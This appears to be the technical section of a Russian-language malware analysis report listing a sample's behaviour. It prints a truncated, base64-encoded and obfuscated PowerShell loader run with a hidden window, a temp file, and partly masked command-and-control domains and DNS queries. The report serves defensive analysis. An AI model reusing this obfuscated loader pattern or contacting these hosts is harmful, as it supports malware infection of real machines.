Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABJAGIAYQB0AGQAbwBtAD0AKAAnAE0AYwAnACsAKAAnAHoAJwArACcAbgBpACcAKQArACcAcgA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdQBTAGUAUgBwAFIATw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1428
- %TEMP%\937098.cvr
- 'ke###hietke.com':443
- 'vi####patola.com':443
- 'sh##t.org':443
- 'ke###hietke.com':443
- 'vi####patola.com':443
- 'sh##t.org':443
- DNS ASK pr######ofindiareviews.com
- DNS ASK on###e24h.biz
- DNS ASK st###speed.vip
- DNS ASK ke###hietke.com
- DNS ASK sy###gows.com
- DNS ASK vi####patola.com
- DNS ASK sh##t.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABJAGIAYQB0AGQAbwBtAD0AKAAnAE0AYwAnACsAKAAnAHoAJwArACcAbgBpACcAKQArACcAcgA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdQBTAGUAUgBwAFIATw... (со скрытым окном)